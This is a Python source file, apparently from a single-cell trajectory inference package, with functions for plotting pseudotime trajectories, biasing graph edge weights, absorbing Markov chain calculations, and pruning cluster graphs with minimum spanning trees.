ax.plot([cur_x1, prev_x1], [cur_y1, prev_y1], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if mmdd_loc == 1:
ax.plot([cur_x1, prev_x2], [cur_y1, prev_y2], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if mmdd_loc == 2:
ax.plot([cur_x2, prev_x1], [cur_y2, prev_y1], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if mmdd_loc == 3:
ax.plot([cur_x2, prev_x2], [cur_y2, prev_y2], color='black', linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
if (path_x_start > path_x_end): direction_arrow_orange = -1 # going LEFT
if (path_x_start <= path_x_end): direction_arrow_orange = 1 # going RIGHT
if (abs(
path_x_start - path_x_end) > 2.5): # |(abs(orange_m[path_i, 2] - orange_m[path_i + 1, 1]) > 1)):
if (direction_arrow_orange == -1): # & :
ax.arrow(orange_GAM_xval[nx_spacing], yg_orange[nx_spacing],
orange_GAM_xval[nx_spacing - 1] - orange_GAM_xval[nx_spacing],
yg_orange[nx_spacing - 1] - yg_orange[nx_spacing], shape='full', lw=0,
length_includes_head=True,
head_width=0.5, color='dimgray', zorder=3)
if (direction_arrow_orange == 1): # &(abs(orange_m[path_i,0]-orange_m[path_i+1,0])>0.5):
ax.arrow(orange_GAM_xval[nx_spacing], yg_orange[nx_spacing],
orange_GAM_xval[nx_spacing + 1] - orange_GAM_xval[nx_spacing],
yg_orange[nx_spacing + 1] - yg_orange[nx_spacing], shape='full', lw=0,
length_includes_head=True,
head_width=0.5,
color='dimgray', zorder=3)
prev_x1 = cur_x1
prev_y1 = cur_y1
prev_x2 = cur_x2
prev_y2 = cur_y2
ax.scatter(x_sc, y_sc, color='pink', zorder=3, label=str(ti), s=22)
ax.text(x_sc + 0.5, y_sc + 0.5, 'TS ' + str(ti), color='black')
return
def get_biased_weights(edgelist, weights, pt, round_no=1):
# print('weights', type(weights), weights)
# small nu means less biasing (0.5 is quite mild)
# larger nu (in our case 1/nu) means more aggressive biasing https://en.wikipedia.org/wiki/Generalised_logistic_function
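# Worked example with illustrative numbers (not taken from the data): with
# K=1, C=1, c=0, nu=1 and b=1, an edge going forward in pseudotime
# (t_ab = Pt_a - Pt_b = -0.5) gets Bias_ab = 1/(1+exp(-0.5)) ~ 0.62, while the
# reverse edge (t_ab = +0.5) gets ~ 0.38, so forward edges keep more weight.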
print(len(edgelist), len(weights))
bias_weight = []
if round_no == 1:
b = 1 # 1 # 0.5
else:
b = 20 # 20 twenty is used for all the CD34 Human cells
K = 1
c = 0
C = 1
nu = 1
high_weights_th = np.mean(weights)
high_pt_th = np.percentile(np.asarray(pt), 80)
loc_high_weights = np.where(weights > high_weights_th)[0]
loc_high_pt = np.where(np.asarray(pt) > high_pt_th)[0]
#print('weight hi th', high_weights_th)
#print('loc hi pt', loc_high_pt)
# print('loc hi weight', loc_high_weights)
#print('edges of high weight', [edgelist[i] for i in loc_high_weights])
edgelist_hi = [edgelist[i] for i in loc_high_weights]
for i in loc_high_weights:
# print('loc of high weight along edgeweight', i)
start = edgelist[i][0]
end = edgelist[i][1]
# print('start and end node', start, end)
if (start in loc_high_pt) | (end in loc_high_pt):
# print("found a high pt high weight node", (start, end), pt[start], pt[end])
weights[i] = 0.5 * np.mean(weights)
upper_lim = np.percentile(weights, 90) # 80
lower_lim = np.percentile(weights, 10) # 20
weights = [i if i <= upper_lim else upper_lim for i in weights]
weights = [i if i >= lower_lim else lower_lim for i in weights]
for i, (start, end) in enumerate(edgelist):
# print('i, start, end', i, start, end)
Pt_a = pt[start]
Pt_b = pt[end]
P_ab = weights[i]
t_ab = Pt_a - Pt_b
Bias_ab = K / ((C + math.exp(b * (t_ab + c)))) ** nu
new_weight = (Bias_ab * P_ab)
bias_weight.append(new_weight)
# print('tab', t_ab, 'pab', P_ab, 'biased_pab', new_weight)
print('original weights', len(weights), list(enumerate(zip(edgelist, weights))))
print('bias weights', list(enumerate(zip(edgelist, bias_weight))))
#print('length bias weights', len(bias_weight))
# bias_weight=np.asarray(bias_weight)
# bias_weight = (bias_weight-np.min(bias_weight)+0.1)/(np.max(bias_weight)-np.min(bias_weight)+0.1)
return list(bias_weight)
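# The two helpers below assume the standard absorbing-Markov-chain convention
# (an assumption, not stated in the original): N is the fundamental matrix
# (I - Q)^-1 of the transient-to-transient block Q, and R is the
# transient-to-absorbing block. N.dot(ones) then gives the expected number of
# steps before absorption from each transient state, and M = N.dot(R) gives
# the probability of being absorbed in each absorbing state.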
def expected_num_steps(start_i, N):
n_t = N.shape[0]
N_steps = np.dot(N, np.ones(n_t))
n_steps_i = N_steps[start_i]
return n_steps_i
def absorption_probability(N, R, absorption_state_j):
M = np.dot(N, R)
vec_prob_end_in_j = M[:, absorption_state_j]
return M, vec_prob_end_in_j
def most_likely_path(P_transition_absorbing_markov, start_i, end_i):
    # The original left this as a stub; a minimal sketch of the intended logic (an assumption):
    # -log(probability) edge lengths make the shortest path the most probable path.
    P = np.clip(np.asarray(P_transition_absorbing_markov), 0.0, 1.0 - 1e-12)
    with np.errstate(divide='ignore'):
        neg_log_P = np.where(P > 0, -np.log(P), 0.0)
    graph_absorbing_markov = ig.Graph.Weighted_Adjacency(neg_log_P.tolist(), attr='weight')
    shortest_path = graph_absorbing_markov.get_shortest_paths(start_i, to=end_i, weights='weight')[0]
    print('the shortest path beginning at ', start_i, 'and ending in ', end_i, 'is:', shortest_path)
    return shortest_path
def draw_trajectory_gams(X_dimred, sc_supercluster_nn, cluster_labels, super_cluster_labels, super_edgelist, x_lazy,
alpha_teleport,
projected_sc_pt, true_label, knn, ncomp, final_super_terminal, sub_terminal_clusters,
title_str="hitting times", ):
x = X_dimred[:, 0]
y = X_dimred[:, 1]
df = pd.DataFrame({'x': x, 'y': y, 'cluster': cluster_labels, 'super_cluster': super_cluster_labels,
'projected_sc_pt': projected_sc_pt},
columns=['x', 'y', 'cluster', 'super_cluster', 'projected_sc_pt'])
df_mean = df.groupby('cluster', as_index=False).mean()
sub_cluster_isin_supercluster = df_mean[['cluster', 'super_cluster']]
print('sub_cluster_isin_supercluster', sub_cluster_isin_supercluster)
sub_cluster_isin_supercluster = sub_cluster_isin_supercluster.sort_values(by='cluster')
sub_cluster_isin_supercluster['int_supercluster'] = sub_cluster_isin_supercluster['super_cluster'].round(0).astype(
int)
print('sub_cluster_isin_supercluster', sub_cluster_isin_supercluster)
print('final_super_terminal', final_super_terminal)
df_super_mean = df.groupby('super_cluster', as_index=False).mean()
pt = df_super_mean['projected_sc_pt'].values
pt_int = [int(i) for i in pt]
pt_str = [str(i) for i in pt_int]
pt_sub = [str(int(i)) for i in df_mean['projected_sc_pt'].values]
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
num_parc_group = len(set(true_label))
line = np.linspace(0, 1, num_parc_group)
for color, group in zip(line, set(true_label)):
where = np.where(np.array(true_label) == group)[0]
ax1.scatter(X_dimred[where, 0], X_dimred[where, 1], label=group, c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend(fontsize=6)
ax1.set_title('true labels, ncomps:' + str(ncomp) + '. knn:' + str(knn))
for e_i, (start, end) in enumerate(super_edgelist):
if pt[start] >= pt[end]:
temp = end
end = start
start = temp
x_i_start = df[df['super_cluster'] == start]['x'].values # groupby('cluster').mean()['x'].values
y_i_start = df[df['super_cluster'] == start]['y'].values # .groupby('cluster').mean()['y'].values
x_i_end = df[df['super_cluster'] == end]['x'].values # .groupby('cluster').mean()['x'].values
y_i_end = df[df['super_cluster'] == end]['y'].values # groupby('cluster').mean()['y'].values
direction_arrow = 1
super_start_x = X_dimred[sc_supercluster_nn[start], 0] # df[df['super_cluster'] == start].mean()['x']
super_end_x = X_dimred[sc_supercluster_nn[end], 0] # df[df['super_cluster'] == end].mean()['x']
super_start_y = X_dimred[sc_supercluster_nn[start], 1] # df[df['super_cluster'] == start].mean()['y']
super_end_y = X_dimred[sc_supercluster_nn[end], 1] # df[df['super_cluster'] == end].mean()['y']
if super_start_x > super_end_x: direction_arrow = -1
ext_maxx = False
minx = min(super_start_x, super_end_x)
maxx = max(super_start_x, super_end_x)
miny = min(super_start_y, super_end_y)
maxy = max(super_start_y, super_end_y)
x_val = np.concatenate([x_i_start, x_i_end])
y_val = np.concatenate([y_i_start, y_i_end])
idx_keep = np.where((x_val <= maxx) & (x_val >= minx))[
0] # np.where((X_dimred[:,0]<=maxx) & (X_dimred[:,0]>=minx))#
idy_keep = np.where((y_val <= maxy) & (y_val >= miny))[
0] # np.where((X_dimred[:,1]<=maxy) & (X_dimred[:,1]>=miny))#
idx_keep = np.intersect1d(idy_keep, idx_keep)
x_val = x_val[idx_keep] # X_dimred[idx_keep,0]#
y_val = y_val[idx_keep] # X_dimred[idx_keep,1]# y_val[idx_keep]
print('start and end', start, '', end)
super_mid_x = (super_start_x + super_end_x) / 2
super_mid_y = (super_start_y + super_end_y) / 2
from scipy.spatial import distance
very_straight = False
if abs(minx - maxx) <= 1:
very_straight = True
straight_level = 10
noise = 0.01
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise, super_mid_x])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise, super_mid_y])
else:
straight_level = 3
noise = 0.1 # 0.05
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise])
for i in range(straight_level): # DO THE SAME FOR A MIDPOINT TOO
y_super = np.concatenate([y_super, y_super])
x_super = np.concatenate([x_super, x_super])
list_selected_clus = list(zip(x_val, y_val))
if (len(list_selected_clus) >= 1) & (very_straight == True):
dist = distance.cdist([(super_mid_x, super_mid_y)], list_selected_clus, 'euclidean')
if len(list_selected_clus) >= 2:
k = 2
else:
k = 1
midpoint_loc = dist[0].argsort()[:k] # np.where(dist[0]==np.min(dist[0]))[0][0]
midpoint_xy = []
for i in range(k):
midpoint_xy.append(list_selected_clus[midpoint_loc[i]])
noise = 0.05
if k == 1:
mid_x = np.array([midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][
0] - noise]) # ,midpoint_xy[1][0], midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array([midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][
1] - noise]) # ,midpoint_xy[1][1], midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
if k == 2:
mid_x = np.array(
[midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][0] - noise, midpoint_xy[1][0],
midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array(
[midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][1] - noise, midpoint_xy[1][1],
midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
for i in range(3):
mid_x = np.concatenate([mid_x, mid_x])
mid_y = np.concatenate([mid_y, mid_y])
x_super = np.concatenate([x_super, mid_x])
y_super = np.concatenate([y_super, mid_y])
x_val = np.concatenate([x_val, x_super])
y_val = np.concatenate([y_val, y_super])
x_val = x_val.reshape((len(x_val), -1))
y_val = y_val.reshape((len(y_val), -1))
xp = np.linspace(minx, maxx, 500)
gam50 = pg.LinearGAM(n_splines=4, spline_order=3, lam=10).gridsearch(x_val, y_val)
XX = gam50.generate_X_grid(term=0, n=500)
preds = gam50.predict(XX)
if ext_maxx == False:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # minx+3
else:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # maxx-3
# cc = ['black', 'red', 'blue', 'yellow', 'pink'][random.randint(0, 4)]
ax2.plot(XX, preds, linewidth=1, c='dimgray')
# med_loc = np.where(xp == np.median(xp[idx_keep]))[0]
mean_temp = np.mean(xp[idx_keep])
closest_val = xp[idx_keep][0]
closest_loc = idx_keep[0]
for i, xp_val in enumerate(xp[idx_keep]):
if abs(xp_val - mean_temp) < abs(closest_val - mean_temp):
closest_val = xp_val
closest_loc = idx_keep[i]
step = 1
if direction_arrow == 1: # smooth instead of preds
ax2.arrow(xp[closest_loc], preds[closest_loc], xp[closest_loc + step] - xp[closest_loc],
preds[closest_loc + step] - preds[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=.2, color='dimgray') # , head_starts_at_zero = direction_arrow )
else:
ax2.arrow(xp[closest_loc], preds[closest_loc], xp[closest_loc - step] - xp[closest_loc],
preds[closest_loc - step] - preds[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=.2, color='dimgray')
x_cluster = df_mean['x']
y_cluster = df_mean['y']
num_parc_group = len(set(cluster_labels))
c_edge = []
width_edge = []
pen_color = []
super_cluster_label = []
terminal_count_ = 0
dot_size = []
for i in range(len(set(super_cluster_labels))):
if i in final_super_terminal:
print('super cluster', i, 'is a super terminal with sub_terminal cluster',
sub_terminal_clusters[terminal_count_])
width_edge.append(2)
c_edge.append('yellow')
pen_color.append('black')
super_cluster_label.append('TS' + str(sub_terminal_clusters[terminal_count_]))
dot_size.append(60)
terminal_count_ = terminal_count_ + 1
else:
width_edge.append(0)
c_edge.append('black')
pen_color.append('grey')
super_cluster_label.append('')
dot_size.append(40)
# ax2.scatter(x_cluster, y_cluster, c='red') #doesnt visualize as well to just take the embedding cluster-mean x,y values
# text annotations for the super cluster locations
# for i, type in enumerate(pt_str):
# ax2.text(df_super_mean['x'][i], df_super_mean['y'][i], 'C' + str(i), weight='bold')
# for i in range(len(x_cluster)):
# ax2.text(x_cluster[i], y_cluster[i], 'c' + str(i))
ax2.set_title('lazy:' + str(x_lazy) + ' teleport' + str(alpha_teleport) + 'super_knn:' + str(knn))
# ax2.set_title('super_knn:' + str(knn) )
ax2.scatter(X_dimred[:, 0], X_dimred[:, 1], c=projected_sc_pt, cmap='viridis_r', alpha=0.5)
# ax2.scatter(df_super_mean['x'], df_super_mean['y'], c='black', s=60, edgecolors = c_edge, linewidth = width_edge)
count_ = 0
for i, c, w, pc, dsz in zip(sc_supercluster_nn, c_edge, width_edge, pen_color, dot_size):
ax2.scatter(X_dimred[i, 0], X_dimred[i, 1], c='black', s=dsz, edgecolors=c, linewidth=w)
ax2.text(X_dimred[i, 0] + 0.5, X_dimred[i, 1] + 0.5, super_cluster_label[count_],
color=pc) # using the SC_NN location is good
count_ = count_ + 1
plt.title(title_str)
return
def draw_trajectory_dimred(X_dimred, sc_supercluster_nn, cluster_labels, super_cluster_labels, super_edgelist, x_lazy,
alpha_teleport,
projected_sc_pt, true_label, knn, ncomp, final_super_terminal,
title_str="hitting times", ):
x = X_dimred[:, 0]
y = X_dimred[:, 1]
df = pd.DataFrame({'x': x, 'y': y, 'cluster': cluster_labels, 'super_cluster': super_cluster_labels,
'projected_sc_pt': projected_sc_pt},
columns=['x', 'y', 'cluster', 'super_cluster', 'projected_sc_pt'])
df_mean = df.groupby('cluster', as_index=False).mean()
sub_cluster_isin_supercluster = df_mean[['cluster', 'super_cluster']]
sub_cluster_isin_supercluster = sub_cluster_isin_supercluster.sort_values(by='cluster')
sub_cluster_isin_supercluster['int_supercluster'] = sub_cluster_isin_supercluster['super_cluster'].round(1).astype(
int)
df_super_mean = df.groupby('super_cluster', as_index=False).mean()
pt = df_super_mean['projected_sc_pt'].values
pt_int = [int(i) for i in pt]
pt_str = [str(i) for i in pt_int]
pt_sub = [str(int(i)) for i in df_mean['projected_sc_pt'].values]
f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)
num_parc_group = len(set(true_label))
line = np.linspace(0, 1, num_parc_group)
for color, group in zip(line, set(true_label)):
where = np.where(np.array(true_label) == group)[0]
ax1.scatter(X_dimred[where, 0], X_dimred[where, 1], label=group, c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend(fontsize=6)
ax1.set_title('true labels, ncomps:' + str(ncomp) + '. knn:' + str(knn))
for e_i, (start, end) in enumerate(super_edgelist):
if pt[start] >= pt[end]:
temp = end
end = start
start = temp
x_i_start = df[df['super_cluster'] == start].groupby('cluster').mean()['x'].values
y_i_start = df[df['super_cluster'] == start].groupby('cluster').mean()['y'].values
x_i_end = df[df['super_cluster'] == end].groupby('cluster').mean()['x'].values
y_i_end = df[df['super_cluster'] == end].groupby('cluster').mean()['y'].values
direction_arrow = 1
super_start_x = X_dimred[sc_supercluster_nn[start], 0] # df[df['super_cluster'] == start].mean()['x']
super_end_x = X_dimred[sc_supercluster_nn[end], 0] # df[df['super_cluster'] == end].mean()['x']
super_start_y = X_dimred[sc_supercluster_nn[start], 1] # df[df['super_cluster'] == start].mean()['y']
super_end_y = X_dimred[sc_supercluster_nn[end], 1] # df[df['super_cluster'] == end].mean()['y']
if super_start_x > super_end_x: direction_arrow = -1
ext_maxx = False
minx = min(super_start_x, super_end_x)
maxx = max(super_start_x, super_end_x)
miny = min(super_start_y, super_end_y)
maxy = max(super_start_y, super_end_y)
x_val = np.concatenate([x_i_start, x_i_end])
y_val = np.concatenate([y_i_start, y_i_end])
idx_keep = np.where((x_val <= maxx) & (x_val >= minx))[0]
idy_keep = np.where((y_val <= maxy) & (y_val >= miny))[0]
print('len x-val before intersect', len(x_val))
idx_keep = np.intersect1d(idy_keep, idx_keep)
x_val = x_val[idx_keep]
y_val = y_val[idx_keep]
super_mid_x = (super_start_x + super_end_x) / 2
super_mid_y = (super_start_y + super_end_y) / 2
from scipy.spatial import distance
very_straight = False
if abs(minx - maxx) <= 1:
very_straight = True
straight_level = 10
noise = 0.01
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise, super_mid_x])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise, super_mid_y])
else:
straight_level = 3
noise = 0.1 # 0.05
x_super = np.array(
[super_start_x, super_end_x, super_start_x, super_end_x, super_start_x + noise, super_end_x + noise,
super_start_x - noise, super_end_x - noise])
y_super = np.array(
[super_start_y, super_end_y, super_start_y, super_end_y, super_start_y + noise, super_end_y + noise,
super_start_y - noise, super_end_y - noise])
for i in range(straight_level): # DO THE SAME FOR A MIDPOINT TOO
y_super = np.concatenate([y_super, y_super])
x_super = np.concatenate([x_super, x_super])
list_selected_clus = list(zip(x_val, y_val))
if (len(list_selected_clus) >= 1) & (very_straight == True):
dist = distance.cdist([(super_mid_x, super_mid_y)], list_selected_clus, 'euclidean')
print('dist', dist)
if len(list_selected_clus) >= 2:
k = 2
else:
k = 1
midpoint_loc = dist[0].argsort()[:k] # np.where(dist[0]==np.min(dist[0]))[0][0]
print('midpoint loc', midpoint_loc)
midpoint_xy = []
for i in range(k):
midpoint_xy.append(list_selected_clus[midpoint_loc[i]])
# midpoint_xy = list_selected_clus[midpoint_loc]
noise = 0.05
print(midpoint_xy, 'is the midpoint between clus', pt[start], 'and ', pt[end])
if k == 1:
mid_x = np.array([midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][
0] - noise]) # ,midpoint_xy[1][0], midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array([midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][
1] - noise]) # ,midpoint_xy[1][1], midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
if k == 2:
mid_x = np.array(
[midpoint_xy[0][0], midpoint_xy[0][0] + noise, midpoint_xy[0][0] - noise, midpoint_xy[1][0],
midpoint_xy[1][0] + noise, midpoint_xy[1][0] - noise])
mid_y = np.array(
[midpoint_xy[0][1], midpoint_xy[0][1] + noise, midpoint_xy[0][1] - noise, midpoint_xy[1][1],
midpoint_xy[1][1] + noise, midpoint_xy[1][1] - noise])
for i in range(3):
mid_x = np.concatenate([mid_x, mid_x])
mid_y = np.concatenate([mid_y, mid_y])
x_super = np.concatenate([x_super, mid_x])
y_super = np.concatenate([y_super, mid_y])
x_val = np.concatenate([x_val, x_super])
y_val = np.concatenate([y_val, y_super])
z = np.polyfit(x_val, y_val, 2)
xp = np.linspace(minx, maxx, 500)
p = np.poly1d(z)
smooth = p(xp)
if ext_maxx == False:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # minx+3
else:
idx_keep = np.where((xp <= (maxx)) & (xp >= (minx)))[0] # maxx-3
ax2.plot(xp[idx_keep], smooth[idx_keep], linewidth=3, c='dimgrey')
# med_loc = np.where(xp == np.median(xp[idx_keep]))[0]
mean_temp = np.mean(xp[idx_keep])
closest_val = xp[idx_keep][0]
closest_loc = idx_keep[0]
for i, xp_val in enumerate(xp[idx_keep]):
if abs(xp_val - mean_temp) < abs(closest_val - mean_temp):
closest_val = xp_val
closest_loc = idx_keep[i]
step = 1
if direction_arrow == 1: # smooth instead of preds
ax2.arrow(xp[closest_loc], smooth[closest_loc], xp[closest_loc + step] - xp[closest_loc],
smooth[closest_loc + step] - smooth[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=1, color='dimgrey') # , head_starts_at_zero = direction_arrow )
else:
ax2.arrow(xp[closest_loc], smooth[closest_loc], xp[closest_loc - step] - xp[closest_loc],
smooth[closest_loc - step] - smooth[closest_loc], shape='full', lw=0, length_includes_head=True,
head_width=1, color='dimgrey')
x_cluster = df_mean['x']
y_cluster = df_mean['y']
num_parc_group = len(set(cluster_labels))
c_edge = []
width_edge = []
for i in range(num_parc_group):
if i in final_super_terminal:
width_edge.append(2.5)
c_edge.append('yellow')
else:
width_edge.append(0)
c_edge.append('black')
ax2.scatter(x_cluster, y_cluster, c='red')
for i, type in enumerate(pt_str):
ax2.text(df_super_mean['x'][i], df_super_mean['y'][i], 'C' + str(i), weight='bold')
for i in range(len(x_cluster)):
ax2.text(x_cluster[i], y_cluster[i], pt_sub[i] + 'c' + str(i))
ax2.set_title('lazy:' + str(x_lazy) + ' teleport' + str(alpha_teleport) + 'super_knn:' + str(knn))
ax2.scatter(X_dimred[:, 0], X_dimred[:, 1], c=projected_sc_pt, cmap='viridis_r', alpha=0.5)
ax2.scatter(df_super_mean['x'], df_super_mean['y'], c='black', s=60, edgecolors=c_edge, linewidth=width_edge)
plt.title(title_str)
return
def csr_mst(adjacency_matrix):
# return minimum spanning tree from adjacency matrix (csr)
Tcsr = adjacency_matrix.copy()
n_components_mst, comp_labels_mst = connected_components(csgraph=Tcsr, directed=False, return_labels=True)
print('number of components before mst', n_components_mst)
print('len Tcsr data', len(Tcsr.data))
Tcsr.data = -1 * Tcsr.data
Tcsr.data = Tcsr.data - np.min(Tcsr.data)
Tcsr.data = Tcsr.data + 1
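# Weights are negated and shifted to be strictly positive so that the minimum
# spanning tree keeps the edges with the largest original weights (the
# strongest connections) rather than the weakest ones.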
print('len Tcsr data', len(Tcsr.data))
Tcsr = minimum_spanning_tree(Tcsr) # adjacency_matrix)
n_components_mst, comp_labels_mst = connected_components(csgraph=Tcsr, directed=False, return_labels=True)
print('number of components after mst', n_components_mst)
Tcsr = (Tcsr + Tcsr.T) * 0.5 # make symmetric
print('number of components after symmetric mst', n_components_mst)
print('len Tcsr data', len(Tcsr.data))
return Tcsr
def connect_all_components(MSTcsr, cluster_graph_csr, adjacency_matrix):
# connect forest of MSTs (csr)
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
while n_components > 1:
sub_td = MSTcsr[comp_labels == 0, :][:, comp_labels != 0]
print('minimum value of link connecting components', np.min(sub_td.data))
locxy = scipy.sparse.find(MSTcsr == np.min(sub_td.data))
for i in range(len(locxy[0])):
if (comp_labels[locxy[0][i]] == 0) & (comp_labels[locxy[1][i]] != 0):
x = locxy[0][i]
y = locxy[1][i]
minval = adjacency_matrix[x, y]
cluster_graph_csr[x, y] = minval
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
print('number of connected components after reconnecting ', n_components)
return cluster_graph_csr
def local_pruning_clustergraph_mst(adjacency_matrix, global_pruning_std=1, max_outgoing=30, preserve_disconnected=True):
# larger pruning_std factor means less pruning
# the mst is only used to reconnect components that become disconnected due to pruning
from scipy.sparse.csgraph import minimum_spanning_tree
Tcsr = csr_mst(adjacency_matrix)
initial_links_n = len(adjacency_matrix.data)
n_components_0, comp_labels_0 = connected_components(csgraph=adjacency_matrix, directed=False, return_labels=True)
print('number of components before pruning', n_components_0, comp_labels_0)
adjacency_matrix = scipy.sparse.csr_matrix.todense(adjacency_matrix)
row_list = []
col_list = []
weight_list = []
neighbor_array = adjacency_matrix # not listed in any order of proximity
n_cells = neighbor_array.shape[0]
rowi = 0
for i in range(neighbor_array.shape[0]):
row = np.asarray(neighbor_array[i, :]).flatten()
# print('row, row')
n_nonz = np.sum(row > 0)
# print('n nonzero 1', n_nonz)
n_nonz = min(n_nonz, max_outgoing)
to_keep_index = np.argsort(row)[::-1][0:n_nonz] # np.where(row>np.mean(row))[0]#
# print('to keep', to_keep_index)
updated_nn_weights = list(row[to_keep_index])
for ik in range(len(to_keep_index)):
row_list.append(rowi)
col_list.append(to_keep_index[ik])
dist = updated_nn_weights[ik]
weight_list.append(dist)
rowi = rowi + 1
final_links_n = len(weight_list)
print('final links n', final_links_n)
cluster_graph_csr = csr_matrix((np.array(weight_list), (np.array(row_list), np.array(col_list))),
shape=(n_cells, n_cells))
sources, targets = cluster_graph_csr.nonzero()
mask = np.zeros(len(sources), dtype=bool)
cluster_graph_csr.data = cluster_graph_csr.data / (np.std(cluster_graph_csr.data)) # normalize
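# Global pruning: edges whose normalized weight falls more than
# global_pruning_std standard deviations below the mean are removed below.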
threshold_global = np.mean(cluster_graph_csr.data) - global_pruning_std * np.std(cluster_graph_csr.data)
mask |= (cluster_graph_csr.data < (threshold_global)) # smaller Jaccard weight means weaker edge
cluster_graph_csr.data[mask] = 0
cluster_graph_csr.eliminate_zeros()
print('shape of cluster graph', cluster_graph_csr.shape)
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
print('number of connected components after pruning', n_components)
if (preserve_disconnected == True) & (n_components > n_components_0): # preserve initial disconnected components
Td = Tcsr.todense()
Td[Td == 0] = 999.999
n_components_ = n_components
while n_components_ > n_components_0:
for i in range(n_components_0):
loc_x = np.where(comp_labels_0 == i)[0]
len_i = len(set(comp_labels[loc_x]))
print('locx', loc_x, len_i)
while len_i > 1:
s = list(set(comp_labels[loc_x]))
loc_notxx = np.intersect1d(loc_x, np.where((comp_labels != s[0]))[0])
# print('loc_notx', loc_notxx)
loc_xx = np.intersect1d(loc_x, np.where((comp_labels == s[0]))[0])
sub_td = Td[loc_xx, :][:, loc_notxx]
# print('subtd-min', np.min(sub_td))
locxy = np.where(Td == np.min(sub_td))
for i_xy in range(len(locxy[0])):  # separate index so the enclosing component loop's `i` is preserved
if (comp_labels[locxy[0][i_xy]] != comp_labels[locxy[1][i_xy]]):
x = locxy[0][i_xy]
y = locxy[1][i_xy]
minval = adjacency_matrix[x, y]
print('inside reconnecting components while preserving original ', x, y, minval)
cluster_graph_csr[x, y] = minval
n_components_, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False,
return_labels=True)
loc_x = np.where(comp_labels_0 == i)[0]
len_i = len(set(comp_labels[loc_x]))
print('number of connected components after reconnecting ', n_components_)
'''
if (n_components > 1) & (preserve_disconnected == False):
cluster_graph_csr = connect_all_components(Tcsr, cluster_graph_csr, adjacency_matrix)
n_components, comp_labels = connected_components(csgraph=cluster_graph_csr, directed=False, return_labels=True)
'''
sources, targets = cluster_graph_csr.nonzero()
edgelist = list(zip(sources, targets))
edgeweights = cluster_graph_csr.data / (np.std(cluster_graph_csr.data))
trimmed_n = (initial_links_n - final_links_n) * 100 / initial_links_n
trimmed_n_glob = (initial_links_n - len(edgeweights)) / initial_links_n
if global_pruning_std < 0.5:
print("percentage links trimmed from local pruning relative to start", trimmed_n)
print("percentage links trimmed from global pruning relative to start", trimmed_n_glob)
return edgeweights, edgelist, comp_labels
def get_sparse_from_igraph(graph, weight_attr=None):
edges = graph.get_edgelist()
if weight_attr is None:
weights = [1] * len(edges)
else:
weights = graph.es[weight_attr]
if not graph.is_directed():
edges.extend([(v, u) for u, v in edges])
weights.extend(weights)
shape = graph.vcount()
shape = (shape, shape)
if len(edges) > 0:
return csr_matrix((weights, zip(*edges)), shape=shape)
else:
return csr_matrix(shape)
class PARC:
def __init__(self, data, true_label=None, anndata=None, dist_std_local=2, jac_std_global='median',
keep_all_local_dist='auto',
too_big_factor=0.4, small_pop=10, jac_weighted_edges=True, knn=30, n_iter_leiden=5, random_seed=42,
num_threads=-1, distance='l2', time_smallpop=15, pseudotime=False,
path='/home/shobi/Trajectory/', super_cluster_labels=False,
super_node_degree_list=False, super_terminal_cells=False, x_lazy=0.95, alpha_teleport=0.99,
root_user="root_cluster", preserve_disconnected=True, dataset="humanCD34", super_terminal_clusters=[], do_magic_bool=False, is_coarse = True, csr_full_graph='', ig_full_graph = '',csr_array_pruned='', full_neighbor_array=''):
# higher dist_std_local means more edges are kept
# higher jac_std_global means more edges are kept
if keep_all_local_dist == 'auto':
if data.shape[0] > 300000:
keep_all_local_dist = True # skips local pruning to increase speed
else:
keep_all_local_dist = False
self.data = data
self.true_label = true_label
self.anndata = anndata
self.dist_std_local = dist_std_local
self.jac_std_global = jac_std_global ##0.15 is also a recommended value performing empirically similar to 'median'
self.keep_all_local_dist = keep_all_local_dist
